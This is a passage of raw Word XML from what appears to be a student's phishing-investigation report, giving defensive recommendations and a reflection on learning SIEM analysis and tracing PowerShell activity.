        <w:t xml:space="preserve">Make sure that all software is up to date. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Have a plan in place to deal with any malicious attacks.  A step-by-step process. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000089">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Long-Term Improvements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At a basic level, send out an email reminding users to be aware of the characteristics of phishing emails, such as not opening attachments or clicking links from senders that they don’t know.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As mentioned above, email gateway logs, and email filtering would help. Also, have a set timeframe to review the logs. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run all email attachments through antivirus software.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">REFLECTION</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000094">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I started out not really understanding how to use SIEM at all. My knowledge of what I was seeing was minimal. It felt like a different language to me. So I treated it as such by doing a lot of research on the terms I saw in the output. For example, what was the meaning of IEX? I utilized online resources, including reading about MITRE ATT&amp;CKS.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I learned that detection design is more step-by-step than I thought. There is a lot of “If this, then that”. If you see PowerShell launched, then look for whatever came after it, and then when you find the follow-up section, then look for what comes next. You repeat this until you reach the end or simply can’t follow it any longer. Prevention is key whenever possible, as everyone needs to be aware of the basics, such as not clicking attachments from people you don’t recognize or automatically clicking a link because your Netflix account is allegedly closed if you don’t pay.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I would like to improve my knowledge of what is out there that is or could be malicious. What I learned is that there is a lot that I don’t know. Ignorance is not bliss: ignorance is scary.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haz4rdw4re.io" TargetMode="External"/><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ichael.ascot@tryhatme.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